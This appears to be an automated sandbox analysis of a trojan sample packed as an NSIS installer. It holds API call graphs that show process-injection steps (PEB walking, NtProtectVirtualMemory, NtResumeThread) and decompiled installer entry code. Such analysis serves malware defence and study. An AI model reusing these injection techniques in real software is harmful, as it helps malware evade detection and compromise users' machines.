12179->12185 12180->12179 12181 40491a 12186 404a0e SendMessageW 12181->12186 12193 4045e6 KiUserCallbackDispatcher 12182->12193 12185->12184 12186->12164 12188 40482d GetDlgItem 12194 4045f9 SendMessageW 12188->12194 12190 404843 SendMessageW 12191 404860 GetSysColor 12190->12191 12192 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 12190->12192 12191->12192 12192->12184 12193->12188 12194->12190 12195->12181 12199 405c8e ShellExecuteExW 12196->12199 12198 404998 LoadCursorW SetCursor 12198->12170 12199->12198 12200 402383 12201 40238a 12200->12201 12204 40239d 12200->12204 12202 4066a5 17 API calls 12201->12202 12203 402397 12202->12203 12203->12204 12205 405cc8 MessageBoxIndirectW 12203->12205 12205->12204 12206 33926fc 12207 339271c 12206->12207 12208 339db0f 2 API calls 12207->12208 12209 339272f 12208->12209 12210 339db0f 2 API calls 12209->12210 12211 339277b 12210->12211 10744 40248a 10745 402da6 17 API calls 10744->10745 10746 40249c 10745->10746 10747 402da6 17 API calls 10746->10747 10748 4024a6 10747->10748 10761 402e36 10748->10761 10751 402c2a 10752 4024de 10754 4024ea 10752->10754 10765 402d84 10752->10765 10753 402da6 17 API calls 10755 4024d4 lstrlenW 10753->10755 10757 402509 RegSetValueExW 10754->10757 10758 403371 44 API calls 10754->10758 10755->10752 10759 40251f RegCloseKey 10757->10759 10758->10757 10759->10751 10762 402e51 10761->10762 10768 406503 10762->10768 10766 4066a5 17 API calls 10765->10766 10767 402d99 10766->10767 10767->10754 10769 406512 10768->10769 10770 4024b6 10769->10770 10771 40651d RegCreateKeyExW 10769->10771 10770->10751 10770->10752 10770->10753 10771->10770 10785 3392ff6 EnumWindows 10786 3393082 10785->10786 10787 3393062 10785->10787 10787->10786 10790 339db0f 10787->10790 10789 33931aa 10791 339db57 10790->10791 10792 339dba8 10791->10792 10796 339e0d5 GetPEB 10791->10796 10793 339dbdc LoadLibraryA 10792->10793 10795 339dbe6 10793->10795 10795->10789 10797 339e0f5 10796->10797 10797->10792 11721 401491 11722 4056ca 24 API calls 11721->11722 11723 401498 11722->11723 11724 402891 11725 402898 11724->11725 11726 402ba9 11724->11726 11727 402d84 17 API calls 11725->11727 11728 40289f 11727->11728 11729 4028ae SetFilePointer 11728->11729 11729->11726 11730 4028be 11729->11730 11732 4065af wsprintfW 11730->11732 11732->11726 12212 402f93 12213 402fa5 SetTimer 12212->12213 12214 402fbe 12212->12214 12213->12214 12215 40300c 12214->12215 12216 403012 MulDiv 12214->12216 12217 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 12216->12217 12217->12215 10798 3392bef 10800 3392b7b 10798->10800 10800->10798 10801 3392c83 10800->10801 10815 3396101 10800->10815 10824 339e42d 10801->10824 10805 3392ca0 10806 339c9be 10807 339db0f 2 API calls 10806->10807 10808 339c9cb 10807->10808 10810 339d239 10808->10810 10830 339cc2a 10808->10830 10812 339e0d5 GetPEB 10810->10812 10813 339dba8 10810->10813 10811 339dbdc LoadLibraryA 10814 339dbe6 10811->10814 10812->10813 10813->10811 10814->10805 10816 3393100 10815->10816 10817 3396113 10815->10817 10838 3392fc9 10816->10838 10844 3395ee0 10817->10844 10823 3396119 10823->10800 10825 339e0d5 GetPEB 10824->10825 10826 339e43a 10825->10826 10827 3392c9b 10826->10827 10851 339d8d8 10826->10851 10827->10806 10829 33a0b5f 10831 339cc66 10830->10831 10834 339ce66 10831->10834 10833 339cdda 10833->10808 10835 339ce90 CreateFileA 10834->10835 10837 339d1a2 10835->10837 10837->10833 10839 3392ffb EnumWindows 10838->10839 10840 3393082 10839->10840 10841 3393062 10839->10841 10841->10840 10842 339db0f 2 API calls 10841->10842 10843 33931aa 10842->10843 10845 3393100 10844->10845 10845->10844 10846 3396043 10845->10846 10847 3392fc9 3 API calls 10845->10847 10846->10823 10848 3393105 10847->10848 10849 339db0f 2 API calls 10848->10849 10850 33931aa 10849->10850 10852 3393100 10851->10852 10853 339d98a 10851->10853 10852->10853 10854 3392fc9 3 API calls 10852->10854 10853->10829 10855 3393105 10854->10855 10856 339db0f 2 API calls 10855->10856 10857 33931aa 10856->10857 10858 339f0ef 10859 339f11d 10858->10859 10860 339db0f 2 API calls 10859->10860 10861 339f147 10860->10861 10862 339db0f 2 API calls 10861->10862 10863 339f158 10862->10863 10864 339f161 GetPEB 10863->10864 10865 339f1cc 10864->10865 10878 339fc0d 10865->10878 10867 339f7ff 10868 339f214 10868->10867 10869 339f802 10868->10869 10874 339f49a 10868->10874 10872 339fa97 10869->10872 10873 339f8c1 10869->10873 10870 339fc0d NtProtectVirtualMemory 10871 339fc07 10870->10871 10872->10870 10875 339fc0d NtProtectVirtualMemory 10873->10875 10877 339fc0d NtProtectVirtualMemory 10874->10877 10876 339fa94 10875->10876 10877->10867 10879 339fc87 NtProtectVirtualMemory 10878->10879 10879->10868 12233 401b9b 12234 401ba8 12233->12234 12235 401bec 12233->12235 12238 401c31 12234->12238 12242 401bbf 12234->12242 12236 401bf1 12235->12236 12237 401c16 GlobalAlloc 12235->12237 12245 40239d 12236->12245 12254 406668 lstrcpynW 12236->12254 12240 4066a5 17 API calls 12237->12240 12239 4066a5 17 API calls 12238->12239 12238->12245 12244 402397 12239->12244 12240->12238 12252 406668 lstrcpynW 12242->12252 12243 401c03 GlobalFree 12243->12245 12244->12245 12248 405cc8 MessageBoxIndirectW 12244->12248 12247 401bce 12253 406668 lstrcpynW 12247->12253 12248->12245 12250 401bdd 12255 406668 lstrcpynW 12250->12255 12252->12247 12253->12250 12254->12243 12255->12245 11733 3394fe5 11734 3395012 11733->11734 11735 3398515 GetPEB 11733->11735 11735->11734 11084 40259e 11094 402de6 11084->11094 11087 402d84 17 API calls 11088 4025b1 11087->11088 11089 4025d9 RegEnumValueW 11088->11089 11090 4025cd RegEnumKeyW 11088->11090 11092 40292e 11088->11092 11091 4025ee RegCloseKey 11089->11091 11090->11091 11091->11092 11095 402da6 17 API calls 11094->11095 11096 402dfd 11095->11096 11097 4064d5 RegOpenKeyExW 11096->11097 11098 4025a8 11097->11098 11098->11087 11736 40149e 11737 4014ac PostQuitMessage 11736->11737 11738 40239d 11736->11738 11737->11738 11743 70e2103d 11746 70e2101b 11743->11746 11747 70e215b6 GlobalFree 11746->11747 11748 70e21020 11747->11748 11749 70e21027 GlobalAlloc 11748->11749 11750 70e21024 11748->11750 11749->11750 11751 70e215dd 3 API calls 11750->11751 11752 70e2103b 11751->11752 12256 33964e6 12257 3396543 12256->12257 12258 3396616 NtResumeThread 12257->12258 12259 3396613 12258->12259 11111 33a00da 11113 33a00df 11111->11113 11114 33a0103 11113->11114 11115 33a02c9 NtResumeThread 11114->11115 11116 33a0312 11115->11116 11753 70e21000 11754 70e2101b 5 API calls 11753->11754 11755 70e21019 11754->11755 11117 4015a3 11118 402da6 17 API calls 11117->11118 11119 4015aa SetFileAttributesW 11118->11119 11120 4015bc 11119->11120 12260 401fa4 12261 402da6 17 API calls 12260->12261 12262 401faa 12261->12262 12263 4056ca 24 API calls 12262->12263 12264 401fb4 12263->12264 12265 405c4b 2 API calls 12264->12265 12266 401fba 12265->12266 12267 401fdd CloseHandle 12266->12267 12269 406ae0 5 API calls 12266->12269 12270 40292e 12266->12270 12267->12270 12271 401fcf 12269->12271 12271->12267 12273 4065af wsprintfW 12271->12273 12273->12267 12274 4021aa 12275 402da6 17 API calls 12274->12275 12276 4021b1 12275->12276 12277 402da6 17 API calls 12276->12277 12278 4021bb 12277->12278 12279 402da6 17 API calls 12278->12279 12280 4021c5 12279->12280 12281 402da6 17 API calls 12280->12281 12282 4021cf 12281->12282 12283 402da6 17 API calls 12282->12283 12284 4021d9 12283->12284 12285 402218 CoCreateInstance 12284->12285 12286 402da6 17 API calls 12284->12286 12289 402237 12285->12289 12286->12285 12287 401423 24 API calls 12288 4022f6 12287->12288 12289->12287 12289->12288 11763 3398bd4 11764 3398c06 11763->11764 11764->11764 11765 3398c49 GetPEB 11764->11765 11766 3398c58 11765->11766 11766->11766 11767 3398cda 11766->11767 11768 339db0f 11766->11768 11769 3398e66 11767->11769 11770 3398dcd GetPEB 11767->11770 11772 339e0d5 GetPEB 11768->11772 11773 339dba8 11768->11773 11770->11769 11771 339dbdc LoadLibraryA 11774 339dbe6 11771->11774 11772->11773 11773->11771 12290 70e2170d 12291 70e215b6 GlobalFree 12290->12291 12293 70e21725 12291->12293 12292 70e2176b GlobalFree 12293->12292 12294 70e21740 12293->12294 12295 70e21757 VirtualFree 12293->12295 12294->12292 12295->12292 11174 4023b2 11175 4023ba 11174->11175 11177 4023c0 11174->11177 11176 402da6 17 API calls 11175->11176 11176->11177 11178 402da6 17 API calls 11177->11178 11179 4023ce 11177->11179 11178->11179 11180 4023dc 11179->11180 11181 402da6 17 API calls 11179->11181 11182 402da6 17 API calls 11180->11182 11181->11180 11183 4023e5 WritePrivateProfileStringW 11182->11183 11784 404ab5 11785 404ae1 11784->11785 11786 404af2 11784->11786 11845 405cac GetDlgItemTextW 11785->11845 11788 404afe GetDlgItem 11786->11788 11794 404b5d 11786->11794 11791 404b12 11788->11791 11789 404c41 11842 404df0 11789->11842 11847 405cac GetDlgItemTextW 11789->11847 11790 404aec 11792 4068ef 5 API calls 11790->11792 11793 404b26 SetWindowTextW 11791->11793 11797 405fe2 4 API calls 11791->11797 11792->11786 11798 4045c4 18 API calls 11793->11798 11794->11789 11799 4066a5 17 API calls 11794->11799 11794->11842 11796 40462b 8 API calls 11801 404e04 11796->11801 11802 404b1c 11797->11802 11803 404b42 11798->11803 11804 404bd1 SHBrowseForFolderW 11799->11804 11800 404c71 11805 40603f 18 API calls 11800->11805 11802->11793 11809 405f37 3 API calls 11802->11809 11806 4045c4 18 API calls 11803->11806 11804->11789 11807 404be9 CoTaskMemFree 11804->11807 11808 404c77 11805->11808 11810 404b50 11806->11810 11811 405f37 3 API calls 11807->11811 11848 406668 lstrcpynW 11808->11848 11809->11793 11846 4045f9 SendMessageW 11810->11846 11813 404bf6 11811->11813 11816 404c2d SetDlgItemTextW 11813->11816 11820 4066a5 17 API calls 11813->11820 11815 404b56 11818 406a35 5 API calls 11815->11818 11816->11789 11817 404c8e 11819 406a35 5 API calls 11817->11819 11818->11794 11826 404c95 11819->11826 11822 404c15 lstrcmpiW 11820->11822 11821 404cd6 11849 406668 lstrcpynW 11821->11849 11822->11816 11823 404c26 lstrcatW 11822->11823 11823->11816 11825 404cdd 11827 405fe2 4 API calls 11825->11827 11826->11821 11831 405f83 2 API calls 11826->11831 11832 404d2e 11826->11832 11828 404ce3 GetDiskFreeSpaceW 11827->11828 11830 404d07 MulDiv 11828->11830 11828->11832 11830->11832 11831->11826 11833 404d9f 11832->11833 11835 404f3a 20 API calls 11832->11835 11834 404dc2 11833->11834 11836 40140b 2 API calls 11833->11836 11850 4045e6 KiUserCallbackDispatcher 11834->11850 11837 404d8c 11835->11837 11836->11834 11839 404da1 SetDlgItemTextW 11837->11839 11840 404d91 11837->11840 11839->11833 11841 404e71 20 API calls 11840->11841 11841->11833 11842->11796 11843 404dde 11843->11842 11851 404a0e 11843->11851 11845->11790 11846->11815 11847->11800 11848->11817 11849->11825 11850->11843 11852 404a21 SendMessageW 11851->11852 11853 404a1c 11851->11853 11852->11842 11853->11852 11854 4014b8 11855 4014be 11854->11855 11856 401389 2 API calls 11855->11856 11857 4014c6 11856->11857

                                                                                    Executed Functions

                                                                                    Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450stringfilecomCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 59 4038e9-4038ea 41->59 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a call 403c25 OleUninitialize 48->65 51->46 51->52 52->46 57 4038d0-4038d4 53->57 58 4038d6-4038d8 53->58 54->53 61 403881-403889 54->61 57->58 63 4038f9-403906 call 406668 57->63 58->41 59->32 66 403890 61->66 67 40388b-40388e 61->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 77 403b91-403b97 65->77 78 403b7c-403b8b call 405cc8 ExitProcess 65->78 66->53 67->53 67->66 84 403a0c-403a19 69->84 85 4039bc-4039f1 69->85 80 403a54-403a57 70->80 82 403b99-403bae GetCurrentProcess OpenProcessToken 77->82 83 403c0f-403c17 77->83 80->65 91 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 82->91 92 403bdf-403bed call 406a35 82->92 86 403c19 83->86 87 403c1c-403c1f ExitProcess 83->87 88 403a1b-403a29 call 40603f 84->88 89 403a5c-403a70 call 405c33 lstrcatW 84->89 93 4039f3-4039f7 85->93 86->87 88->65 103 403a2f-403a45 call 406668 * 2 88->103 106 403a72-403a78 lstrcatW 89->106 107 403a7d-403a97 lstrcatW lstrcmpiW 89->107 91->92 104 403bfb-403c06 ExitWindowsEx 92->104 105 403bef-403bf9 92->105 97 403a00-403a08 93->97 98 4039f9-4039fe 93->98 97->93 102 403a0a 97->102 98->97 98->102 102->84 103->70 104->83 111 403c08-403c0a call 40140b 104->111 105->104 105->111 106->107 108 403b6a 107->108 109 403a9d-403aa0 107->109 108->65 112 403aa2-403aa7 call 405b99 109->112 113 403aa9 call 405c16 109->113 111->83 121 403aae-403abe SetCurrentDirectoryW 112->121 113->121 123 403ac0-403ac6 call 406668 121->123 124 403acb-403af7 call 406668 121->124 123->124 128 403afc-403b17 call 4066a5 DeleteFileW 124->128 131 403b57-403b61 128->131 132 403b19-403b29 CopyFileW 128->132 131->128 134 403b63-403b65 call 406428 131->134 132->131 133 403b2b-403b4b call 406428 call 4066a5 call 405c4b 132->133 133->131 142 403b4d-403b54 CloseHandle 133->142 134->108 142->131
                                                                                    C-Code - Quality: 79%
                                                                                    			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t180 = E00406A35(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E004069C5(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t189,  &_v1016, 0x2b4, _t189); // executed
				E00406668(0x429260, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe\" ";
				E00406668(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x42a260 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00435002;
				}
				_t199 = CharNextW(E00405F64(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405F64(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E0040360F(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403C25();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x42a2f4 == _t189) {
														L77:
														_t120 =  *0x42a30c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E00406A35(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t189) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t265);
												goto L68;
											}
											_t219 = E00405F64(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe\" ") {
													_t190 = E00405C33(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t220 = L"C:\\Users\\Arthur\\Desktop";
													_t138 = lstrcmpiW(_t235, L"C:\\Users\\Arthur\\Desktop");
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t220);
														}
														E00406668(0x42b000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x42b800 = _t144;
														do {
															E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe", 0x420f08, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E00406428(_t202, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t235, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t153 = E00405C4B(0x420f08);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E0040603F(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E00406668(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Trojan.Inject.11626.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E0040360F(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E0040360F(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x42a300 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}



















































                                                                                    0x0040364e
                                                                                    0x0040364f
                                                                                    0x00403656
                                                                                    0x00403659
                                                                                    0x00403660
                                                                                    0x00403663
                                                                                    0x00403676
                                                                                    0x0040367c
                                                                                    0x0040367f
                                                                                    0x00403682
                                                                                    0x00403690
                                                                                    0x00403698
                                                                                    0x004036a3
                                                                                    0x004036bc
                                                                                    0x004036be
                                                                                    0x004036c6
                                                                                    0x004036c6
                                                                                    0x004036d1
                                                                                    0x004036d3
                                                                                    0x004036d3
                                                                                    0x004036e8
                                                                                    0x0040370d
                                                                                    0x0040371b
                                                                                    0x0040371e
                                                                                    0x00403725
                                                                                    0x0040372c
                                                                                    0x0040372c
                                                                                    0x00403725
                                                                                    0x0040372e
                                                                                    0x00403733
                                                                                    0x00403734
                                                                                    0x00403740
                                                                                    0x00403744
                                                                                    0x0040374b
                                                                                    0x00403759
                                                                                    0x0040375e
                                                                                    0x00403765
                                                                                    0x00403769
                                                                                    0x0040376d
                                                                                    0x0040376f
                                                                                    0x0040376f
                                                                                    0x0040376d
                                                                                    0x00403776
                                                                                    0x0040377d
                                                                                    0x00403783
                                                                                    0x0040379b
                                                                                    0x004037ab
                                                                                    0x004037b0
                                                                                    0x004037b6
                                                                                    0x004037bd
                                                                                    0x004037c4
                                                                                    0x004037c6
                                                                                    0x004037c7
                                                                                    0x004037d1
                                                                                    0x004037d8
                                                                                    0x004037da
                                                                                    0x004037dc
                                                                                    0x004037dc
                                                                                    0x004037ef
                                                                                    0x004037f1
                                                                                    0x004038eb
                                                                                    0x004038eb
                                                                                    0x004038ee
                                                                                    0x004038f1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004037fb
                                                                                    0x004037fc
                                                                                    0x004037ff
                                                                                    0x00403808
                                                                                    0x00403808
                                                                                    0x0040380b
                                                                                    0x0040380e
                                                                                    0x00403811
                                                                                    0x00403814
                                                                                    0x00403814
                                                                                    0x00403814
                                                                                    0x00403815
                                                                                    0x00403819
                                                                                    0x004038d9
                                                                                    0x004038e2
                                                                                    0x004038e4
                                                                                    0x004038e7
                                                                                    0x004038ea
                                                                                    0x004038ea
                                                                                    0x004038ea
                                                                                    0x00000000
                                                                                    0x0040381f
                                                                                    0x00403820
                                                                                    0x00403821
                                                                                    0x00403825
                                                                                    0x0040383f
                                                                                    0x00403846
                                                                                    0x00403859
                                                                                    0x0040385a
                                                                                    0x0040386f
                                                                                    0x00403874
                                                                                    0x00403876
                                                                                    0x00403878
                                                                                    0x00403894
                                                                                    0x0040389b
                                                                                    0x004038ae
                                                                                    0x004038af
                                                                                    0x004038c4
                                                                                    0x004038ca
                                                                                    0x004038cc
                                                                                    0x004038ce
                                                                                    0x004038d6
                                                                                    0x004038d8
                                                                                    0x00000000
                                                                                    0x004038d8
                                                                                    0x004038d2
                                                                                    0x004038d4
                                                                                    0x004038f9
                                                                                    0x004038fd
                                                                                    0x00403906
                                                                                    0x0040390b
                                                                                    0x00403911
                                                                                    0x0040391c
                                                                                    0x0040391e
                                                                                    0x00403923
                                                                                    0x00403925
                                                                                    0x0040397d
                                                                                    0x00403982
                                                                                    0x0040398b
                                                                                    0x00403992
